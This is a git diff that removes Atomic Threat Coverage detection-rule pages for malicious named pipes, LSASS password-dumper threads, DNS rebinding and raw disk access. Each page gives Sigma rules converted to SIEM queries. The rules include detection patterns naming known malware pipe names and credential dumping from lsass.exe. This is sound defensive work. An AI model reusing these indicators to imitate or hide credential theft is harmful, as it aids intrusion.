-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:("17" OR "18") AND winlog.event_data.PipeName.keyword:(\\isapi_http OR \\isapi_dg OR \\isapi_dg2 OR \\sdlrpc OR \\ahexec OR \\winsession OR \\lsassw OR \\46a676ab7f179e511e30dd2dc41bd388 OR \\9f81f59bc58452127884ce513865ed20 OR \\e710f28d59aa529d6792ca6ff0ca1b34 OR \\rpchlp_3 OR \\NamePipe_MoreWindows OR \\pcheap_reuse OR \\msagent_* OR \\gruntsvc))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/fe3ac066-98bb-432a-b1e7-a5229cb39d4a <<EOF
-{
-  "metadata": {
-    "title": "Malicious Named Pipe",
-    "description": "Detects the creation of a named pipe used by known APT malware",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.privilege_escalation",
-      "attack.t1055"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:(\"17\" OR \"18\") AND winlog.event_data.PipeName.keyword:(\\\\isapi_http OR \\\\isapi_dg OR \\\\isapi_dg2 OR \\\\sdlrpc OR \\\\ahexec OR \\\\winsession OR \\\\lsassw OR \\\\46a676ab7f179e511e30dd2dc41bd388 OR \\\\9f81f59bc58452127884ce513865ed20 OR \\\\e710f28d59aa529d6792ca6ff0ca1b34 OR \\\\rpchlp_3 OR \\\\NamePipe_MoreWindows OR \\\\pcheap_reuse OR \\\\msagent_* OR \\\\gruntsvc))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:(\"17\" OR \"18\") AND winlog.event_data.PipeName.keyword:(\\\\isapi_http OR \\\\isapi_dg OR \\\\isapi_dg2 OR \\\\sdlrpc OR \\\\ahexec OR \\\\winsession OR \\\\lsassw OR \\\\46a676ab7f179e511e30dd2dc41bd388 OR \\\\9f81f59bc58452127884ce513865ed20 OR \\\\e710f28d59aa529d6792ca6ff0ca1b34 OR \\\\rpchlp_3 OR \\\\NamePipe_MoreWindows OR \\\\pcheap_reuse OR \\\\msagent_* OR \\\\gruntsvc))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Malicious Named Pipe'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:("17" "18") AND PipeName.keyword:(\\isapi_http \\isapi_dg \\isapi_dg2 \\sdlrpc \\ahexec \\winsession \\lsassw \\46a676ab7f179e511e30dd2dc41bd388 \\9f81f59bc58452127884ce513865ed20 \\e710f28d59aa529d6792ca6ff0ca1b34 \\rpchlp_3 \\NamePipe_MoreWindows \\pcheap_reuse \\msagent_* \\gruntsvc))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" (EventCode="17" OR EventCode="18") (PipeName="\\isapi_http" OR PipeName="\\isapi_dg" OR PipeName="\\isapi_dg2" OR PipeName="\\sdlrpc" OR PipeName="\\ahexec" OR PipeName="\\winsession" OR PipeName="\\lsassw" OR PipeName="\\46a676ab7f179e511e30dd2dc41bd388" OR PipeName="\\9f81f59bc58452127884ce513865ed20" OR PipeName="\\e710f28d59aa529d6792ca6ff0ca1b34" OR PipeName="\\rpchlp_3" OR PipeName="\\NamePipe_MoreWindows" OR PipeName="\\pcheap_reuse" OR PipeName="\\msagent_*" OR PipeName="\\gruntsvc"))
-```
-
-
-### logpoint
-    
-```
-(event_id IN ["17", "18"] PipeName IN ["\\isapi_http", "\\isapi_dg", "\\isapi_dg2", "\\sdlrpc", "\\ahexec", "\\winsession", "\\lsassw", "\\46a676ab7f179e511e30dd2dc41bd388", "\\9f81f59bc58452127884ce513865ed20", "\\e710f28d59aa529d6792ca6ff0ca1b34", "\\rpchlp_3", "\\NamePipe_MoreWindows", "\\pcheap_reuse", "\\msagent_*", "\\gruntsvc"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*17|.*18))(?=.*(?:.*\isapi_http|.*\isapi_dg|.*\isapi_dg2|.*\sdlrpc|.*\ahexec|.*\winsession|.*\lsassw|.*\46a676ab7f179e511e30dd2dc41bd388|.*\9f81f59bc58452127884ce513865ed20|.*\e710f28d59aa529d6792ca6ff0ca1b34|.*\rpchlp_3|.*\NamePipe_MoreWindows|.*\pcheap_reuse|.*\msagent_.*|.*\gruntsvc)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_password_dumper_lsass.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_password_dumper_lsass.md
deleted file mode 100644
index c69ded8..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/sysmon_password_dumper_lsass.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | Password Dumper Remote Thread in LSASS       |
-|:-------------------------|:------------------|
-| **Description**          | Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | stable |
-| **References**           | <ul><li>[https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm](https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm)</li></ul>  |
-| **Author**               | Thomas Patzke |
-| Other Tags           | <ul><li>attack.s0005</li><li>attack.t1003.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Password Dumper Remote Thread in LSASS
-id: f239b326-2f41-4d6b-9dfa-c846a60ef505
-description: Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events.
-references:
-    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm
-status: stable
-author: Thomas Patzke
-date: 2017/02/19
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    selection:
-        EventID: 8
-        TargetImage: 'C:\Windows\System32\lsass.exe'
-        StartModule:
-    condition: selection
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - attack.s0005
-    - attack.t1003.001
-falsepositives:
-    - unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "8" -and $_.message -match "TargetImage.*C:\\Windows\\System32\\lsass.exe" -and -not StartModule="*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:"8" AND winlog.event_data.TargetImage:"C\:\\Windows\\System32\\lsass.exe" AND NOT _exists_:winlog.event_data.StartModule)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f239b326-2f41-4d6b-9dfa-c846a60ef505 <<EOF
-{
-  "metadata": {
-    "title": "Password Dumper Remote Thread in LSASS",
-    "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events.",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.s0005",
-      "attack.t1003.001"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"8\" AND winlog.event_data.TargetImage:\"C\\:\\\\Windows\\\\System32\\\\lsass.exe\" AND NOT _exists_:winlog.event_data.StartModule)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"8\" AND winlog.event_data.TargetImage:\"C\\:\\\\Windows\\\\System32\\\\lsass.exe\" AND NOT _exists_:winlog.event_data.StartModule)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Password Dumper Remote Thread in LSASS'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"8" AND TargetImage:"C\:\\Windows\\System32\\lsass.exe" AND NOT _exists_:StartModule)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="8" TargetImage="C:\\Windows\\System32\\lsass.exe" NOT StartModule="*")
-```
-
-
-### logpoint
-    
-```
-(event_id="8" TargetImage="C:\\Windows\\System32\\lsass.exe" -StartModule=*)
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*8)(?=.*C:\Windows\System32\lsass\.exe)(?=.*(?!StartModule)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_possible_dns_rebinding.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_possible_dns_rebinding.md
deleted file mode 100644
index d408654..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/sysmon_possible_dns_rebinding.md
+++ /dev/null
@@ -1,223 +0,0 @@
-| Title                    | Possible DNS Rebinding       |
-|:-------------------------|:------------------|
-| **Description**          | Detects several different DNS-answers by one domain with IPs from internal and external networks. Normally, DNS-answer contain TTL >100. (DNS-record will saved in host cache for a while TTL). |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0011: Command and Control](https://attack.mitre.org/tactics/TA0011)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1043: Commonly Used Port](https://attack.mitre.org/techniques/T1043)</li><li>[T1571: Non-Standard Port](https://attack.mitre.org/techniques/T1571)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1571: Non-Standard Port](../Triggers/T1571.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      |  There are no documented False Positives for this Detection Rule yet  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325](https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325)</li></ul>  |
-| **Author**               | Ilyas Ochkov, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Possible DNS Rebinding
-id: eb07e747-2552-44cd-af36-b659ae0958e4
-status: experimental
-description: Detects several different DNS-answers by one domain with IPs from internal and external networks. Normally, DNS-answer contain TTL >100. (DNS-record will saved in host cache for a while TTL).
-date: 2019/10/25
-modified: 2019/11/13
-author: Ilyas Ochkov, oscd.community
-references:
-    - https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325
-tags:
-    - attack.command_and_control
-    - attack.t1043
-    - attack.t1571
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    dns_answer:
-        EventID: 22
-        QueryName: '*'
-        QueryStatus: '0'
-    filter_int_ip:
-        QueryResults|startswith:
-            - '(::ffff:)?10.'
-            - '(::ffff:)?192.168.'
-            - '(::ffff:)?172.16.'
-            - '(::ffff:)?172.17.'
-            - '(::ffff:)?172.18.'
-            - '(::ffff:)?172.19.'
-            - '(::ffff:)?172.20.'
-            - '(::ffff:)?172.21.'
-            - '(::ffff:)?172.22.'
-            - '(::ffff:)?172.23.'
-            - '(::ffff:)?172.24.'
-            - '(::ffff:)?172.25.'
-            - '(::ffff:)?172.26.'
-            - '(::ffff:)?172.27.'
-            - '(::ffff:)?172.28.'
-            - '(::ffff:)?172.29.'
-            - '(::ffff:)?172.30.'
-            - '(::ffff:)?172.31.'
-            - '(::ffff:)?127.'
-    timeframe: 30s
-    condition: (dns_answer and filter_int_ip) and (dns_answer and not filter_int_ip) | count(QueryName) by ComputerName > 3
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "22" -and $_.message -match "QueryName.*.*" -and $_.message -match "QueryStatus.*0" -and ($_.message -match "QueryResults.*(::ffff:)?10..*" -or $_.message -match "QueryResults.*(::ffff:)?192.168..*" -or $_.message -match "QueryResults.*(::ffff:)?172.16..*" -or $_.message -match "QueryResults.*(::ffff:)?172.17..*" -or $_.message -match "QueryResults.*(::ffff:)?172.18..*" -or $_.message -match "QueryResults.*(::ffff:)?172.19..*" -or $_.message -match "QueryResults.*(::ffff:)?172.20..*" -or $_.message -match "QueryResults.*(::ffff:)?172.21..*" -or $_.message -match "QueryResults.*(::ffff:)?172.22..*" -or $_.message -match "QueryResults.*(::ffff:)?172.23..*" -or $_.message -match "QueryResults.*(::ffff:)?172.24..*" -or $_.message -match "QueryResults.*(::ffff:)?172.25..*" -or $_.message -match "QueryResults.*(::ffff:)?172.26..*" -or $_.message -match "QueryResults.*(::ffff:)?172.27..*" -or $_.message -match "QueryResults.*(::ffff:)?172.28..*" -or $_.message -match "QueryResults.*(::ffff:)?172.29..*" -or $_.message -match "QueryResults.*(::ffff:)?172.30..*" -or $_.message -match "QueryResults.*(::ffff:)?172.31..*" -or $_.message -match "QueryResults.*(::ffff:)?127..*") -and ($_.ID -eq "22" -and $_.message -match "QueryName.*.*" -and $_.message -match "QueryStatus.*0") -and  -not (($_.message -match "QueryResults.*(::ffff:)?10..*" -or $_.message -match "QueryResults.*(::ffff:)?192.168..*" -or $_.message -match "QueryResults.*(::ffff:)?172.16..*" -or $_.message -match "QueryResults.*(::ffff:)?172.17..*" -or $_.message -match "QueryResults.*(::ffff:)?172.18..*" -or $_.message -match "QueryResults.*(::ffff:)?172.19..*" -or $_.message -match "QueryResults.*(::ffff:)?172.20..*" -or $_.message -match "QueryResults.*(::ffff:)?172.21..*" -or $_.message -match "QueryResults.*(::ffff:)?172.22..*" -or $_.message -match "QueryResults.*(::ffff:)?172.23..*" -or $_.message -match "QueryResults.*(::ffff:)?172.24..*" -or $_.message -match "QueryResults.*(::ffff:)?172.25..*" -or $_.message -match "QueryResults.*(::ffff:)?172.26..*" -or $_.message -match "QueryResults.*(::ffff:)?172.27..*" -or $_.message -match "QueryResults.*(::ffff:)?172.28..*" -or $_.message -match "QueryResults.*(::ffff:)?172.29..*" -or $_.message -match "QueryResults.*(::ffff:)?172.30..*" -or $_.message -match "QueryResults.*(::ffff:)?172.31..*" -or $_.message -match "QueryResults.*(::ffff:)?127..*"))) }  | select ComputerName, QueryName | group ComputerName | foreach { [PSCustomObject]@{'ComputerName'=$_.name;'Count'=($_.group.QueryName | sort -u).count} }  | sort count -desc | where { $_.count -gt 3 }
-```
-
-
-### es-qs
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/sysmon/sysmon_possible_dns_rebinding.yml): Aggregations not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/eb07e747-2552-44cd-af36-b659ae0958e4 <<EOF
-{
-  "metadata": {
-    "title": "Possible DNS Rebinding",
-    "description": "Detects several different DNS-answers by one domain with IPs from internal and external networks. Normally, DNS-answer contain TTL >100. (DNS-record will saved in host cache for a while TTL).",
-    "tags": [
-      "attack.command_and_control",
-      "attack.t1043",
-      "attack.t1571"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"22\" AND QueryName.keyword:* AND QueryStatus:\"0\" AND QueryResults.keyword:(\\(\\:\\:ffff\\:\\)?10.* OR \\(\\:\\:ffff\\:\\)?192.168.* OR \\(\\:\\:ffff\\:\\)?172.16.* OR \\(\\:\\:ffff\\:\\)?172.17.* OR \\(\\:\\:ffff\\:\\)?172.18.* OR \\(\\:\\:ffff\\:\\)?172.19.* OR \\(\\:\\:ffff\\:\\)?172.20.* OR \\(\\:\\:ffff\\:\\)?172.21.* OR \\(\\:\\:ffff\\:\\)?172.22.* OR \\(\\:\\:ffff\\:\\)?172.23.* OR \\(\\:\\:ffff\\:\\)?172.24.* OR \\(\\:\\:ffff\\:\\)?172.25.* OR \\(\\:\\:ffff\\:\\)?172.26.* OR \\(\\:\\:ffff\\:\\)?172.27.* OR \\(\\:\\:ffff\\:\\)?172.28.* OR \\(\\:\\:ffff\\:\\)?172.29.* OR \\(\\:\\:ffff\\:\\)?172.30.* OR \\(\\:\\:ffff\\:\\)?172.31.* OR \\(\\:\\:ffff\\:\\)?127.*) AND (winlog.event_id:\"22\" AND QueryName.keyword:* AND QueryStatus:\"0\") AND (NOT (QueryResults.keyword:(\\(\\:\\:ffff\\:\\)?10.* OR \\(\\:\\:ffff\\:\\)?192.168.* OR \\(\\:\\:ffff\\:\\)?172.16.* OR \\(\\:\\:ffff\\:\\)?172.17.* OR \\(\\:\\:ffff\\:\\)?172.18.* OR \\(\\:\\:ffff\\:\\)?172.19.* OR \\(\\:\\:ffff\\:\\)?172.20.* OR \\(\\:\\:ffff\\:\\)?172.21.* OR \\(\\:\\:ffff\\:\\)?172.22.* OR \\(\\:\\:ffff\\:\\)?172.23.* OR \\(\\:\\:ffff\\:\\)?172.24.* OR \\(\\:\\:ffff\\:\\)?172.25.* OR \\(\\:\\:ffff\\:\\)?172.26.* OR \\(\\:\\:ffff\\:\\)?172.27.* OR \\(\\:\\:ffff\\:\\)?172.28.* OR \\(\\:\\:ffff\\:\\)?172.29.* OR \\(\\:\\:ffff\\:\\)?172.30.* OR \\(\\:\\:ffff\\:\\)?172.31.* OR \\(\\:\\:ffff\\:\\)?127.*))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30s"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"22\" AND QueryName.keyword:* AND QueryStatus:\"0\" AND QueryResults.keyword:(\\(\\:\\:ffff\\:\\)?10.* OR \\(\\:\\:ffff\\:\\)?192.168.* OR \\(\\:\\:ffff\\:\\)?172.16.* OR \\(\\:\\:ffff\\:\\)?172.17.* OR \\(\\:\\:ffff\\:\\)?172.18.* OR \\(\\:\\:ffff\\:\\)?172.19.* OR \\(\\:\\:ffff\\:\\)?172.20.* OR \\(\\:\\:ffff\\:\\)?172.21.* OR \\(\\:\\:ffff\\:\\)?172.22.* OR \\(\\:\\:ffff\\:\\)?172.23.* OR \\(\\:\\:ffff\\:\\)?172.24.* OR \\(\\:\\:ffff\\:\\)?172.25.* OR \\(\\:\\:ffff\\:\\)?172.26.* OR \\(\\:\\:ffff\\:\\)?172.27.* OR \\(\\:\\:ffff\\:\\)?172.28.* OR \\(\\:\\:ffff\\:\\)?172.29.* OR \\(\\:\\:ffff\\:\\)?172.30.* OR \\(\\:\\:ffff\\:\\)?172.31.* OR \\(\\:\\:ffff\\:\\)?127.*) AND (winlog.event_id:\"22\" AND QueryName.keyword:* AND QueryStatus:\"0\") AND (NOT (QueryResults.keyword:(\\(\\:\\:ffff\\:\\)?10.* OR \\(\\:\\:ffff\\:\\)?192.168.* OR \\(\\:\\:ffff\\:\\)?172.16.* OR \\(\\:\\:ffff\\:\\)?172.17.* OR \\(\\:\\:ffff\\:\\)?172.18.* OR \\(\\:\\:ffff\\:\\)?172.19.* OR \\(\\:\\:ffff\\:\\)?172.20.* OR \\(\\:\\:ffff\\:\\)?172.21.* OR \\(\\:\\:ffff\\:\\)?172.22.* OR \\(\\:\\:ffff\\:\\)?172.23.* OR \\(\\:\\:ffff\\:\\)?172.24.* OR \\(\\:\\:ffff\\:\\)?172.25.* OR \\(\\:\\:ffff\\:\\)?172.26.* OR \\(\\:\\:ffff\\:\\)?172.27.* OR \\(\\:\\:ffff\\:\\)?172.28.* OR \\(\\:\\:ffff\\:\\)?172.29.* OR \\(\\:\\:ffff\\:\\)?172.30.* OR \\(\\:\\:ffff\\:\\)?172.31.* OR \\(\\:\\:ffff\\:\\)?127.*))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          },
-          "aggs": {
-            "by": {
-              "terms": {
-                "field": "winlog.ComputerName",
-                "size": 10,
-                "order": {
-                  "_count": "desc"
-                },
-                "min_doc_count": 4
-              },
-              "aggs": {
-                "agg": {
-                  "terms": {
-                    "field": "QueryName",
-                    "size": 10,
-                    "order": {
-                      "_count": "desc"
-                    },
-                    "min_doc_count": 4
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.aggregations.by.buckets.0.agg.buckets.0.doc_count": {
-        "gt": 3
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Possible DNS Rebinding'",
-        "body": "Hits:\n{{#aggregations.agg.buckets}}\n {{key}} {{doc_count}}\n\n{{#by.buckets}}\n-- {{key}} {{doc_count}}\n{{/by.buckets}}\n\n{{/aggregations.agg.buckets}}\n",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/sysmon/sysmon_possible_dns_rebinding.yml): Aggregations not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="22" QueryName="*" QueryStatus="0" (QueryResults="(::ffff:)?10.*" OR QueryResults="(::ffff:)?192.168.*" OR QueryResults="(::ffff:)?172.16.*" OR QueryResults="(::ffff:)?172.17.*" OR QueryResults="(::ffff:)?172.18.*" OR QueryResults="(::ffff:)?172.19.*" OR QueryResults="(::ffff:)?172.20.*" OR QueryResults="(::ffff:)?172.21.*" OR QueryResults="(::ffff:)?172.22.*" OR QueryResults="(::ffff:)?172.23.*" OR QueryResults="(::ffff:)?172.24.*" OR QueryResults="(::ffff:)?172.25.*" OR QueryResults="(::ffff:)?172.26.*" OR QueryResults="(::ffff:)?172.27.*" OR QueryResults="(::ffff:)?172.28.*" OR QueryResults="(::ffff:)?172.29.*" OR QueryResults="(::ffff:)?172.30.*" OR QueryResults="(::ffff:)?172.31.*" OR QueryResults="(::ffff:)?127.*") (EventCode="22" QueryName="*" QueryStatus="0") NOT ((QueryResults="(::ffff:)?10.*" OR QueryResults="(::ffff:)?192.168.*" OR QueryResults="(::ffff:)?172.16.*" OR QueryResults="(::ffff:)?172.17.*" OR QueryResults="(::ffff:)?172.18.*" OR QueryResults="(::ffff:)?172.19.*" OR QueryResults="(::ffff:)?172.20.*" OR QueryResults="(::ffff:)?172.21.*" OR QueryResults="(::ffff:)?172.22.*" OR QueryResults="(::ffff:)?172.23.*" OR QueryResults="(::ffff:)?172.24.*" OR QueryResults="(::ffff:)?172.25.*" OR QueryResults="(::ffff:)?172.26.*" OR QueryResults="(::ffff:)?172.27.*" OR QueryResults="(::ffff:)?172.28.*" OR QueryResults="(::ffff:)?172.29.*" OR QueryResults="(::ffff:)?172.30.*" OR QueryResults="(::ffff:)?172.31.*" OR QueryResults="(::ffff:)?127.*"))) | eventstats dc(QueryName) as val by ComputerName | search val > 3
-```
-
-
-### logpoint
-    
-```
-(event_id="22" QueryName="*" QueryStatus="0" QueryResults IN ["(::ffff:)?10.*", "(::ffff:)?192.168.*", "(::ffff:)?172.16.*", "(::ffff:)?172.17.*", "(::ffff:)?172.18.*", "(::ffff:)?172.19.*", "(::ffff:)?172.20.*", "(::ffff:)?172.21.*", "(::ffff:)?172.22.*", "(::ffff:)?172.23.*", "(::ffff:)?172.24.*", "(::ffff:)?172.25.*", "(::ffff:)?172.26.*", "(::ffff:)?172.27.*", "(::ffff:)?172.28.*", "(::ffff:)?172.29.*", "(::ffff:)?172.30.*", "(::ffff:)?172.31.*", "(::ffff:)?127.*"] (event_id="22" QueryName="*" QueryStatus="0")  -(QueryResults IN ["(::ffff:)?10.*", "(::ffff:)?192.168.*", "(::ffff:)?172.16.*", "(::ffff:)?172.17.*", "(::ffff:)?172.18.*", "(::ffff:)?172.19.*", "(::ffff:)?172.20.*", "(::ffff:)?172.21.*", "(::ffff:)?172.22.*", "(::ffff:)?172.23.*", "(::ffff:)?172.24.*", "(::ffff:)?172.25.*", "(::ffff:)?172.26.*", "(::ffff:)?172.27.*", "(::ffff:)?172.28.*", "(::ffff:)?172.29.*", "(::ffff:)?172.30.*", "(::ffff:)?172.31.*", "(::ffff:)?127.*"])) | chart count(QueryName) as val by ComputerName | search val > 3
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*22)(?=.*.*)(?=.*0)(?=.*(?:.*\(::ffff:\)?10\..*|.*\(::ffff:\)?192\.168\..*|.*\(::ffff:\)?172\.16\..*|.*\(::ffff:\)?172\.17\..*|.*\(::ffff:\)?172\.18\..*|.*\(::ffff:\)?172\.19\..*|.*\(::ffff:\)?172\.20\..*|.*\(::ffff:\)?172\.21\..*|.*\(::ffff:\)?172\.22\..*|.*\(::ffff:\)?172\.23\..*|.*\(::ffff:\)?172\.24\..*|.*\(::ffff:\)?172\.25\..*|.*\(::ffff:\)?172\.26\..*|.*\(::ffff:\)?172\.27\..*|.*\(::ffff:\)?172\.28\..*|.*\(::ffff:\)?172\.29\..*|.*\(::ffff:\)?172\.30\..*|.*\(::ffff:\)?172\.31\..*|.*\(::ffff:\)?127\..*))(?=.*(?:.*(?=.*22)(?=.*.*)(?=.*0)))(?=.*(?!.*(?:.*(?=.*(?:.*\(::ffff:\)?10\..*|.*\(::ffff:\)?192\.168\..*|.*\(::ffff:\)?172\.16\..*|.*\(::ffff:\)?172\.17\..*|.*\(::ffff:\)?172\.18\..*|.*\(::ffff:\)?172\.19\..*|.*\(::ffff:\)?172\.20\..*|.*\(::ffff:\)?172\.21\..*|.*\(::ffff:\)?172\.22\..*|.*\(::ffff:\)?172\.23\..*|.*\(::ffff:\)?172\.24\..*|.*\(::ffff:\)?172\.25\..*|.*\(::ffff:\)?172\.26\..*|.*\(::ffff:\)?172\.27\..*|.*\(::ffff:\)?172\.28\..*|.*\(::ffff:\)?172\.29\..*|.*\(::ffff:\)?172\.30\..*|.*\(::ffff:\)?172\.31\..*|.*\(::ffff:\)?127\..*))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_raw_disk_access_using_illegitimate_tools.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_raw_disk_access_using_illegitimate_tools.md
deleted file mode 100644
index ea22d3a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/sysmon_raw_disk_access_using_illegitimate_tools.md
+++ /dev/null
@@ -1,195 +0,0 @@
-| Title                    | Raw Disk Access Using Illegitimate Tools       |
-|:-------------------------|:------------------|
-| **Description**          | Raw disk access using illegitimate tools, possible defence evasion |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1006: Direct Volume Access](https://attack.mitre.org/techniques/T1006)</li></ul>  |
